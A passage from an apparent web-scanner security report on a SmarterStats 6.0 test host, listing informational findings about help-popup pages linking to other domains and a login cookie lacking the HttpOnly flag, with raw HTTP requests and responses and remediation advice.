User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=goyfjk5bgnfdbekr0r35mk2c; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"208759633","TopBarSection":"AdminReports"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 08:15:44 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 5804



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head id="ctl00_head1"><title>
   SmarterStats Help
</title><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Popup/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="innerpopup" dir="ltr">
   <form name="aspnetForm" method="post" action="frmHelp.aspx?url=admin%2ffrmviewreports&amp;extraInfo=ReportItem_ADMIN_Traffic_Trend" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJLTU4MjI4MjE1DxYEHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYGAgUPFgIeB1Zpc2libGVoZAIHD2QWAmYPZBYCAgEPFgIfAmgWAgIBDxYCHgRUZXh0ZWQCCw9kFggCAw8WAh8DBa8BPGEgdGFyZ2V0PSJfYmxhbmsiIGhyZWY9Imh0dHA6Ly9oZWxwLnNtYXJ0ZXJ0b29scy5jb20vU21hcnRlclN0YXRzL3Y2L2RlZmF1bHQuYXNweD9wPVNBJnY9Ni4wLjM5MzImbGFuZz1lbi1VUyZwYWdlPVJlcG9ydEl0ZW0lNWZBRE1JTiU1ZlRyYWZmaWMlNWZUcmVuZCI+SGVscCBmb3IgdGhpcyBwYWdlPC9hPmQCBQ8WAh8DBX48YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0iaHR0cDovL2hlbHAuc21hcnRlcnRvb2xzLmNvbS9TbWFydGVyU3RhdHMvdjYvZGVmYXVsdC5hc3B4P3A9U0Emdj02LjAuMzkzMiZsYW5nPWVuLVVTIj5IZWxwIFRvcGljczwvYT5kAgcPFgIfAwWRATxhIHRhcmdldD0iX2JsYW5rIiBocmVmPSJodHRwOi8vaGVscC5zbWFydGVydG9vbHMuY29tL1NtYXJ0ZXJTdGF0cy92Ni9kZWZhdWx0LmFzcHg/cD1TQSZ2PTYuMC4zOTMyJmxhbmc9ZW4tVVMmcGFnZT1zZWFyY2giPlNlYXJjaCBPbmxpbmUgSGVscDwvYT5kAgkPFgIfAwUiU21hcnRlclN0YXRzIEZyZWUgRWRpdGlvbiA2LjAuMzkzMmRkjY1KUEA4a0uatFXkyhv+3hoDW55Oq0OEcQ8t6fhajwk=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>

       <script language="javascript" type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           $(function() { setTimeout(function() { GetFocus(); }, 50); RegisterResizeEvent(); });
       </script>

       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager', 'aspnetForm', ['tctl00$UpdatePanel1',''], [], [], 90, 'ctl00');
//]]>
</script>

       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   <div class="PopupHelp">
       <div class="PopupHeader">
           What do you need help with?
       </div>
       <br />
       <ul class="SettingsBulletedList">
           <li>
               <a target="_blank" href="http://help.smartertools.com/SmarterStats/v6/default.aspx?p=SA&v=6.0.3932&lang=en-US&page=ReportItem%5fADMIN%5fTraffic%5fTrend">Help for this page</a></li>
           <li>
               <a target="_blank" href="http://help.smartertools.com/SmarterStats/v6/default.aspx?p=SA&v=6.0.3932&lang=en-US">Help Topics</a></li>
           <li>
               <a target="_blank" href="http://help.smartertools.com/SmarterStats/v6/default.aspx?p=SA&v=6.0.3932&lang=en-US&page=search">Search Online Help</a></li>
       </ul>
       <br />
   </div>
   <div class="PopupAbout">
       SmarterStats Free Edition 6.0.3932<br />
       Copyright &copy; 2003-2010
       All Rights Reserved.<br />
       <a href="http://www.smartertools.com" id="ctl00_MPH_STLink" target="_blank">http://www.smartertools.com</a>
   </div>

       </div>
       <div id="ctl00_Button" class="PopupButtons">
           <div class="ButtonBarLeft">
               

           </div>
           <div class="ButtonBarRight">
               
   <div id="ctl00_BrPH_CancelButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClosePopup(); return false;"><span class="BBInner">Close</span></a></div>

           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
   <span id="ctl00_Scripts_InjectScript"></span>

   

<script type="text/javascript">
//<![CDATA[
document.ResizeEvent();//]]>
</script>
</form>
</body>
</html>


5.4. http://vulnerable.smarterstats.6.0.host:9999/UserControls/Popups/frmHelp.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /UserControls/Popups/frmHelp.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /UserControls/Popups/frmHelp.aspx?url= HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:00:22 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 5653
Connection: Close



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head id="ctl00_head1"><title>
   SmarterStats Help
</title><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Popup/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="innerpopup" dir="ltr">
   <form name="aspnetForm" method="post" action="frmHelp.aspx?url=" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJLTU4MjI4MjE1DxYEHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYGAgUPFgIeB1Zpc2libGVoZAIHD2QWAmYPZBYCAgEPFgIfAmgWAgIBDxYCHgRUZXh0ZWQCCw9kFggCAw8WAh8DBYsBPGEgdGFyZ2V0PSJfYmxhbmsiIGhyZWY9Imh0dHA6Ly9oZWxwLnNtYXJ0ZXJ0b29scy5jb20vU21hcnRlclN0YXRzL3Y2L2RlZmF1bHQuYXNweD9wPURBJnY9Ni4wLjM5MzImbGFuZz1lbi1VUyZwYWdlPSI+SGVscCBmb3IgdGhpcyBwYWdlPC9hPmQCBQ8WAh8DBX48YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0iaHR0cDovL2hlbHAuc21hcnRlcnRvb2xzLmNvbS9TbWFydGVyU3RhdHMvdjYvZGVmYXVsdC5hc3B4P3A9REEmdj02LjAuMzkzMiZsYW5nPWVuLVVTIj5IZWxwIFRvcGljczwvYT5kAgcPFgIfAwWRATxhIHRhcmdldD0iX2JsYW5rIiBocmVmPSJodHRwOi8vaGVscC5zbWFydGVydG9vbHMuY29tL1NtYXJ0ZXJTdGF0cy92Ni9kZWZhdWx0LmFzcHg/cD1EQSZ2PTYuMC4zOTMyJmxhbmc9ZW4tVVMmcGFnZT1zZWFyY2giPlNlYXJjaCBPbmxpbmUgSGVscDwvYT5kAgkPFgIfAwUiU21hcnRlclN0YXRzIEZyZWUgRWRpdGlvbiA2LjAuMzkzMmRk2qeKuvsFtJiATFkCpRly8Ik/vWEulvZhcpMpVdZV0l8=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>

       <script language="javascript" type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           $(function() { setTimeout(function() { GetFocus(); }, 50); RegisterResizeEvent(); });
       </script>

       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager', 'aspnetForm', ['tctl00$UpdatePanel1',''], [], [], 90, 'ctl00');
//]]>
</script>

       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   <div class="PopupHelp">
       <div class="PopupHeader">
           What do you need help with?
       </div>
       <br />
       <ul class="SettingsBulletedList">
           <li>
               <a target="_blank" href="http://help.smartertools.com/SmarterStats/v6/default.aspx?p=DA&v=6.0.3932&lang=en-US&page=">Help for this page</a></li>
           <li>
               <a target="_blank" href="http://help.smartertools.com/SmarterStats/v6/default.aspx?p=DA&v=6.0.3932&lang=en-US">Help Topics</a></li>
           <li>
               <a target="_blank" href="http://help.smartertools.com/SmarterStats/v6/default.aspx?p=DA&v=6.0.3932&lang=en-US&page=search">Search Online Help</a></li>
       </ul>
       <br />
   </div>
   <div class="PopupAbout">
       SmarterStats Free Edition 6.0.3932<br />
       Copyright &copy; 2003-2010
       All Rights Reserved.<br />
       <a href="http://www.smartertools.com" id="ctl00_MPH_STLink" target="_blank">http://www.smartertools.com</a>
   </div>

       </div>
       <div id="ctl00_Button" class="PopupButtons">
           <div class="ButtonBarLeft">
               

           </div>
           <div class="ButtonBarRight">
               
   <div id="ctl00_BrPH_CancelButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClosePopup(); return false;"><span class="BBInner">Close</span></a></div>

           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
   <span id="ctl00_Scripts_InjectScript"></span>

   

<script type="text/javascript">
//<![CDATA[
document.ResizeEvent();//]]>
</script>
</form>
</body>
</html>


5.5. http://vulnerable.smarterstats.6.0.host:9999/UserControls/Popups/frmHelp.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /UserControls/Popups/frmHelp.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /UserControls/Popups/frmHelp.aspx?url= HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:23:45 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 5646
Connection: Close



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head id="ctl00_head1"><title>
   SmarterStats Help
</title><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Popup/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="innerpopup" dir="ltr">
   <form name="aspnetForm" method="post" action="frmHelp.aspx?url=" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>

       <script language="javascript" type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           $(function() { setTimeout(function() { GetFocus(); }, 50); RegisterResizeEvent(); });
       </script>

       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager', 'aspnetForm', ['tctl00$UpdatePanel1',''], [], [], 90, 'ctl00');
//]]>
</script>

       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   <div class="PopupHelp">
       <div class="PopupHeader">
           What do you need help with?
       </div>
       <br />
       <ul class="SettingsBulletedList">
           <li>
               <a target="_blank" href="http://help.smartertools.com/SmarterStats/v6/default.aspx?p=U&v=6.0.3932&lang=en-US&page=">Help for this page</a></li>
           <li>
               <a target="_blank" href="http://help.smartertools.com/SmarterStats/v6/default.aspx?p=U&v=6.0.3932&lang=en-US">Help Topics</a></li>
           <li>
               <a target="_blank" href="http://help.smartertools.com/SmarterStats/v6/default.aspx?p=U&v=6.0.3932&lang=en-US&page=search">Search Online Help</a></li>
       </ul>
       <br />
   </div>
   <div class="PopupAbout">
       SmarterStats Free Edition 6.0.3932<br />
       Copyright &copy; 2003-2010
       All Rights Reserved.<br />
       <a href="http://www.smartertools.com" id="ctl00_MPH_STLink" target="_blank">http://www.smartertools.com</a>
   </div>

       </div>
       <div id="ctl00_Button" class="PopupButtons">
           <div class="ButtonBarLeft">
               

           </div>
           <div class="ButtonBarRight">
               
   <div id="ctl00_BrPH_CancelButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClosePopup(); return false;"><span class="BBInner">Close</span></a></div>

           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
   <span id="ctl00_Scripts_InjectScript"></span>

   

<script type="text/javascript">
//<![CDATA[
document.ResizeEvent();//]]>
</script>
</form>
</body>
</html>


5.6. http://vulnerable.smarterstats.6.0.host:9999/UserControls/Popups/frmHelp.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /UserControls/Popups/frmHelp.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /UserControls/Popups/frmHelp.aspx?url= HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 21:28:46 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 5653
Connection: Close



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head id="ctl00_head1"><title>
   SmarterStats Help
</title><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Popup/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="innerpopup" dir="ltr">
   <form name="aspnetForm" method="post" action="frmHelp.aspx?url=" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>

       <script language="javascript" type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           $(function() { setTimeout(function() { GetFocus(); }, 50); RegisterResizeEvent(); });
       </script>

       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager', 'aspnetForm', ['tctl00$UpdatePanel1',''], [], [], 90, 'ctl00');
//]]>
</script>

       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   <div class="PopupHelp">
       <div class="PopupHeader">
           What do you need help with?
       </div>
       <br />
       <ul class="SettingsBulletedList">
           <li>
               <a target="_blank" href="http://help.smartertools.com/SmarterStats/v6/default.aspx?p=SA&v=6.0.3932&lang=en-US&page=">Help for this page</a></li>
           <li>
               <a target="_blank" href="http://help.smartertools.com/SmarterStats/v6/default.aspx?p=SA&v=6.0.3932&lang=en-US">Help Topics</a></li>
           <li>
               <a target="_blank" href="http://help.smartertools.com/SmarterStats/v6/default.aspx?p=SA&v=6.0.3932&lang=en-US&page=search">Search Online Help</a></li>
       </ul>
       <br />
   </div>
   <div class="PopupAbout">
       SmarterStats Free Edition 6.0.3932<br />
       Copyright &copy; 2003-2010
       All Rights Reserved.<br />
       <a href="http://www.smartertools.com" id="ctl00_MPH_STLink" target="_blank">http://www.smartertools.com</a>
   </div>

       </div>
       <div id="ctl00_Button" class="PopupButtons">
           <div class="ButtonBarLeft">
               

           </div>
           <div class="ButtonBarRight">
               
   <div id="ctl00_BrPH_CancelButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClosePopup(); return false;"><span class="BBInner">Close</span></a></div>

           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
   <span id="ctl00_Scripts_InjectScript"></span>

   

<script type="text/javascript">
//<![CDATA[
document.ResizeEvent();//]]>
</script>
</form>
</body>
</html>


6. Cookie without HttpOnly flag set

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /login.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

POST /login.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/login.aspx
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
